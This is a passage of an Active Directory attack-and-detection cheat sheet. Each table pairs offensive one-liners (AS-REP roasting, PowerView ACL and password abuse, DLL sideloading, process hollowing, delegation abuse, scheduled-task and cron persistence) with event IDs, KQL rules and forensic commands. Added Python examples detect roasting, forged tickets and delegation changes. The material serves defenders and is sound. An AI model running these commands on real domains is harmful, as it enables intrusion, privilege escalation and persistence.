4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4768 | Kerberos Authentication Ticket (TGT) was requested. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Technique | Command | Description |
---|---|---|
AS-REP Roasting | `GetNPUsers.py -request -dc-ip <DC_IP> <DOMAIN>/ -usersfile users.txt` | Uses GetNPUsers.py to request AS-REPs for users without pre-authentication. |
AS-REP Roasting | `Rubeus.exe asreproast` | Uses Rubeus to perform AS-REP roasting on the domain. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4768 | Kerberos Authentication Ticket (TGT) was requested. | `SecurityEvent` |
4769 | Kerberos Service Ticket (TGS) was requested. | `SecurityEvent` |
4771 | Kerberos pre-authentication failed. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

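The Golden Ticket, Kerberoasting and AS-REP Roasting tables above each list 4768 and 4769 as the events to watch, but a bare `where EventID == 4769` fires on every service ticket in the domain. What separates the three techniques is the shape of the ticket traffic: a Kerberoast is one account pulling RC4 service tickets for many SPNs in a short window, an AS-REP roast is a TGT issued with pre-authentication type 0, and a forged TGT is used (4769, 4624) without the KDC ever having logged a 4768 for that account. The following is an added example, not part of the original cheat sheet, that implements those three checks over constructed 4768/4769/4624 records. The field names (`TargetUserName`, `ServiceName`, `TicketEncryptionType`, `PreAuthType`) are those of the real events; the thresholds, windows and sample events are assumptions.

```python
"""Three Kerberos detections over Windows Security events 4768, 4769 and
4624.  Added example, not part of the original cheat sheet; the sample
events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC, the offline-crackable etype


def _ts(s):
    return datetime.fromisoformat(s)


def _account(name):
    """4769 carries 'user@REALM', 4768/4624 carry 'user'; normalise both."""
    return name.split("@")[0].lower()


def build_sample_events():
    base = _ts("2024-03-01T10:00:00")
    ev = [
        # alice: normal flow, TGT then one AES service ticket then a network logon
        {"ts": base, "EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
        {"ts": base + timedelta(seconds=1), "EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "cifs/fs01", "TicketEncryptionType": "0x12"},
        {"ts": base + timedelta(seconds=2), "EventID": 4624, "TargetUserName": "alice", "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
        # bob: a real TGT, then RC4 service tickets for twelve different SPNs in twelve seconds
        {"ts": base + timedelta(seconds=29), "EventID": 4768, "TargetUserName": "bob", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    ]
    for i in range(12):
        ev.append({"ts": base + timedelta(seconds=30 + i), "EventID": 4769, "TargetUserName": "bob@CORP.LOCAL",
                   "ServiceName": f"svc{i:02d}", "TicketEncryptionType": RC4_HMAC})
    # legacy_svc: TGT issued without pre-authentication (PreAuthType 0)
    ev.append({"ts": base + timedelta(minutes=1), "EventID": 4768, "TargetUserName": "legacy_svc",
               "PreAuthType": "0", "TicketEncryptionType": RC4_HMAC})
    # Administrator: service ticket and logon, but no 4768 anywhere (forged TGT presented directly)
    ev.append({"ts": base + timedelta(minutes=2), "EventID": 4769, "TargetUserName": "Administrator@CORP.LOCAL",
               "ServiceName": "cifs/dc01", "TicketEncryptionType": "0x12"})
    ev.append({"ts": base + timedelta(minutes=2, seconds=1), "EventID": 4624, "TargetUserName": "Administrator",
               "LogonType": "3", "AuthenticationPackageName": "Kerberos"})
    return ev


def detect_kerberoasting(events, min_spns=10, window=timedelta(minutes=5)):
    """Accounts that requested RC4 service tickets for >= min_spns distinct SPNs within `window`."""
    per_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4769 and e.get("TicketEncryptionType") == RC4_HMAC:
            per_user[_account(e["TargetUserName"])].append(e)
    hits = set()
    for user, evs in per_user.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            spns = {e["ServiceName"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(spns) >= min_spns:
                hits.add(user)
                break
    return sorted(hits)


def detect_asrep_roasting(events):
    """4768 with PreAuthType 0: the KDC issued a TGT without pre-authentication,
    so the AS-REP is crackable offline. Also worth reviewing: which accounts have DONT_REQ_PREAUTH set."""
    return sorted({_account(e["TargetUserName"]) for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0"})


def detect_tgt_less_tickets(events, lookback=timedelta(hours=10)):
    """Service tickets (4769) for accounts with no 4768 in the preceding `lookback`.
    A forged TGT never produces a 4768, so this needs the 4768 stream from every DC
    in the domain, otherwise tickets issued by another DC look forged."""
    tgt_times = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768:
            tgt_times[_account(e["TargetUserName"])].append(e["ts"])
    hits = set()
    for e in events:
        if e["EventID"] != 4769:
            continue
        user = _account(e["TargetUserName"])
        if not any(timedelta(0) <= e["ts"] - t <= lookback for t in tgt_times.get(user, [])):
            hits.add(user)
    return sorted(hits)


if __name__ == "__main__":
    evs = build_sample_events()
    print("kerberoasting:", detect_kerberoasting(evs))
    print("as-rep roasting:", detect_asrep_roasting(evs))
    print("tickets without TGT:", detect_tgt_less_tickets(evs))
```

The third check is the one that actually distinguishes a Golden Ticket from a legitimate privileged logon, which is why the 4768/4672/4624 rows in the table cannot do it on their own: all three events are present in both cases, and the signal is the absence of 4768. Run it only over the merged 4768 feed from all domain controllers, and expect a small steady-state of false positives from long-lived TGTs renewed outside the lookback.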
Technique | Command | Description |
---|---|---|
GenericWrite | `Set-DomainObjectAcl -TargetIdentity "CN=GroupName,OU=Groups,DC=domain,DC=com" -PrincipalIdentity "hacker" -Rights GenericWrite` | Uses PowerView to modify the ACL of a domain object, granting GenericWrite rights to an attacker. |
GenericWrite | `Add-DomainObjectAcl -TargetIdentity "CN=GroupName,OU=Groups,DC=domain,DC=com" -PrincipalIdentity "hacker" -Rights All` | Adds an ACL entry to a domain object, granting full rights to an attacker. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
5136 | A directory service object was modified. | `SecurityEvent` |
4662 | An operation was performed on an object. | `SecurityEvent` |
4728 | A member was added to a security-enabled global group. | `SecurityEvent` |

Command | Description |
---|---|
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`tcpdump -i eth0 -w network_traffic.pcap` | Captures network traffic for analysis. |

Technique | Command | Description |
---|---|---|
Domain Trust Exploitation | `Get-DomainTrustMapping -API` | Uses PowerView to enumerate domain trusts. |
Domain Trust Exploitation | `Get-NetDomainTrust -Domain yourdomain.com` | Enumerates domain trusts using PowerSploit. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4769 | Kerberos Service Ticket (TGS) was requested. | `SecurityEvent` |
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4624 | Successful account logon. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Technique | Command | Description |
---|---|---|
SeBackupPrivilege Abuse | `Get-SeBackupPrivilege -ComputerName target` | Uses PowerSploit to exploit SeBackupPrivilege on a target computer. |
SeLoadDriverPrivilege Module | `Invoke-SeLoadDriverPrivilege -ComputerName target -DriverPath path_to_driver` | Uses a custom module to load a driver using SeLoadDriverPrivilege. |
ForceChangePassword Abuse | `Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)` | Forces a password change for a domain user using PowerView. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
4728 | A member was added to a security-enabled global group. | `SecurityEvent` |

Command | Description |
---|---|
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`tcpdump -i eth0 -w network_traffic.pcap` | Captures network traffic for analysis. |

Technique | Command | Description |
---|---|---|
DLL Sideloading | `copy evil.dll C:\Path\To\Legitimate\Application\` | Places a malicious DLL in a directory where a legitimate application will load it. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4688 | A new process has been created. | `SecurityEvent \| where EventID == 4688 and NewProcessName contains 'legitimate_application.exe'` |
7 | Image loaded (Sysmon). | `Sysmon \| where EventID == 7 and ImageLoaded contains 'evil.dll'` |
1 | Process creation (Sysmon). | `Sysmon \| where EventID == 1 and ParentImage contains 'legitimate_application.exe'` |

Command | Description |
---|---|
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 dlllist` | Lists loaded DLLs in a memory dump. |
`tcpdump -i eth0 -w network_traffic.pcap` | Captures network traffic for analysis. |

Technique | Command | Description |
---|---|---|
Process Hollowing | `Invoke-ProcessHollowing -SourcePath "C:\Windows\System32\svchost.exe" -TargetPath "C:\Path\To\Malicious.exe"` | Uses a PowerShell script to perform process hollowing. |
Process Doppelgänging | `Invoke-ProcessDoppelganging -Target "C:\Windows\System32\notepad.exe" -Payload "C:\Path\To\Malicious.exe" -Doppelganger "C:\Windows\System32\svchost.exe"` | Executes Process Doppelgänging using a custom tool or script. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4688 | A new process has been created. | `SecurityEvent \| where EventID == 4688 and NewProcessName contains 'notepad.exe'` |
1 | Process creation (Sysmon). | `Sysmon \| where EventID == 1 and ParentImage contains 'svchost.exe'` |
7 | Image loaded (Sysmon). | `Sysmon \| where EventID == 7 and ImageLoaded contains 'malicious.dll'` |

Command | Description |
---|---|
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 pslist` | Lists running processes in a memory dump. |
`tcpdump -i eth0 -w network_traffic.pcap` | Captures network traffic for analysis. |

Technique | Command | Description |
---|---|---|
Unconstrained Delegation Abuse | `Set-ADComputer -Identity "targetComputer" -TrustedForDelegation $true` | Configures a computer for unconstrained delegation using PowerShell. |
Constrained Delegation Abuse | `Set-ADComputer -Identity "targetComputer" -PrincipalsAllowedToDelegateToAccount "attackerAccount"` | Sets constrained delegation on a target computer to an attacker's account. |
Resource-Based Constrained Delegation Abuse | `Add-ADComputerServiceAccount -Identity "targetComputer" -ServiceAccount "attackerAccount"` | Abuses resource-based constrained delegation by assigning a service account to the target computer. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
5136 | A directory service object was modified. | `SecurityEvent \| where EventID == 5136 and ObjectClass == 'computer' and AttributeLDAPDisplayName == 'msDS-AllowedToDelegateTo'` |
4742 | A computer account was changed. | `SecurityEvent \| where EventID == 4742 and ObjectType == 'computer'` |
4672 | Special privileges assigned to new logon. | `SecurityEvent \| where EventID == 4672` |

Command | Description |
---|---|
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`tcpdump -i eth0 -w network_traffic.pcap` | Captures network traffic for analysis. |

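The 5136 rule in the table above watches only `msDS-AllowedToDelegateTo`, which is the attribute written by constrained delegation. The other two rows change different things: `-TrustedForDelegation $true` flips the `TRUSTED_FOR_DELEGATION` bit in `userAccountControl` (visible as old/new UAC values in 4742), and `-PrincipalsAllowedToDelegateToAccount` writes `msDS-AllowedToActOnBehalfOfOtherIdentity` on the target. The following is an added example, not part of the original cheat sheet, that maps 5136 and 4742 records to the delegation change they represent so that all three variants are covered. The field names (`AttributeLDAPDisplayName`, `ObjectDN`, `OldUacValue`, `NewUacValue`, `SubjectUserName`) are those of the real events; the sample events are constructed.

```python
"""Map directory-service change events (5136, 4742) to the delegation
technique they indicate.  Added example, not part of the original cheat
sheet; the sample events are constructed."""

# userAccountControl flags (values from the AD schema)
TRUSTED_FOR_DELEGATION = 0x80000              # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000    # constrained delegation with protocol transition

# 5136 attributes that change a delegation relationship
DELEGATION_ATTRIBUTES = {
    "msds-allowedtodelegateto": "constrained delegation target list changed",
    "msds-allowedtoactonbehalfofotheridentity": "resource-based constrained delegation (RBCD) changed",
}


def build_sample_events():
    """Constructed records: an RBCD write, a constrained-delegation write,
    a UAC change gaining TRUSTED_FOR_DELEGATION, a harmless attribute edit,
    and a 4742 with no UAC change."""
    return [
        {"EventID": 5136, "ObjectClass": "computer", "ObjectDN": "CN=WS05,OU=Workstations,DC=corp,DC=local",
         "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "OperationType": "%%14674",
         "SubjectUserName": "jdoe"},
        {"EventID": 5136, "ObjectClass": "computer", "ObjectDN": "CN=WEB01,OU=Servers,DC=corp,DC=local",
         "AttributeLDAPDisplayName": "msDS-AllowedToDelegateTo", "AttributeValue": "cifs/fs01.corp.local",
         "OperationType": "%%14674", "SubjectUserName": "jdoe"},
        {"EventID": 4742, "TargetUserName": "WS03$", "OldUacValue": "0x1020", "NewUacValue": "0x81020",
         "SubjectUserName": "jdoe"},
        {"EventID": 5136, "ObjectClass": "user", "ObjectDN": "CN=alice,OU=Users,DC=corp,DC=local",
         "AttributeLDAPDisplayName": "description", "OperationType": "%%14674", "SubjectUserName": "helpdesk"},
        {"EventID": 4742, "TargetUserName": "WS04$", "OldUacValue": "0x1020", "NewUacValue": "0x1020",
         "SubjectUserName": "sccm_svc"},
    ]


def classify_delegation_change(event):
    """Return {object, by, finding} for a delegation-relevant change, else None."""
    eid = event.get("EventID")
    if eid == 5136:
        attr = event.get("AttributeLDAPDisplayName", "").lower()
        if attr in DELEGATION_ATTRIBUTES:
            return {"object": event["ObjectDN"], "by": event["SubjectUserName"],
                    "finding": DELEGATION_ATTRIBUTES[attr]}
        return None
    if eid == 4742:
        old = int(event.get("OldUacValue", "0"), 16)
        new = int(event.get("NewUacValue", "0"), 16)
        gained = new & ~old          # bits set now that were not set before
        flags = []
        if gained & TRUSTED_FOR_DELEGATION:
            flags.append("TRUSTED_FOR_DELEGATION (unconstrained)")
        if gained & TRUSTED_TO_AUTH_FOR_DELEGATION:
            flags.append("TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition)")
        if flags:
            return {"object": event["TargetUserName"], "by": event["SubjectUserName"],
                    "finding": "userAccountControl gained " + ", ".join(flags)}
    return None


def find_delegation_changes(events):
    return [r for r in map(classify_delegation_change, events) if r]


if __name__ == "__main__":
    for r in find_delegation_changes(build_sample_events()):
        print(f"{r['object']} changed by {r['by']}: {r['finding']}")
```

Both 5136 and 4742 require the "Audit Directory Service Changes" and "Audit Computer Account Management" subcategories to be enabled on the domain controllers, and 5136 additionally needs a SACL on the objects; without those the rows in the table produce nothing, whichever query sits in the rule column.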
Technique | Command | Description |
---|---|---|
Windows Task Scheduling | `schtasks /create /tn "TaskName" /tr "C:\Path\To\Malicious.exe" /sc daily /st 00:00` | Creates a scheduled task in Windows to execute a malicious file. |
Linux Cron Job Scheduling | `echo "* * * * * /path/to/malicious.sh" \| crontab -` | Installs a crontab entry that runs the script every minute; `crontab -` replaces the user's existing crontab. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4698 | A scheduled task was created (Windows). | `SecurityEvent \| where EventID == 4698` |
1 | Process creation (Sysmon). | `Sysmon \| where EventID == 1 and CommandLine contains 'schtasks'` |
- | Cron job added (Linux). | `Sysmon \| where EventID == 1 and CommandLine contains 'crontab'` |

Command | Description |
---|---|
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 cmdscan` | Scans for command-line history in a memory dump. |
`tcpdump -i eth0 -w network_traffic.pcap` | Captures network traffic for analysis. |